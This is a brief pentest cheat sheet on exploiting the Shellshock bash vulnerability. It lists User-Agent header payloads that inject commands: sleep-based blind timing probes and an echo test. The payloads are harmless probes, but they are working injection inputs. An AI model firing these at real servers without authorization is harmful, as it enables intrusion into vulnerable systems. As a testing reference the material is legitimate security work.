shellshock
Exploiting shellshock vuln
Last updated
Was this helpful?
Exploiting shellshock vuln
Last updated
Was this helpful?
Was this helpful?
#blind test (non apache) test response time
User-Agent: () { :; }; sleep 1
User-Agent: () { :; }; sleep 10
#Echo test (apache should print hello)
User-Agent: () { :; }; /bin/echo hello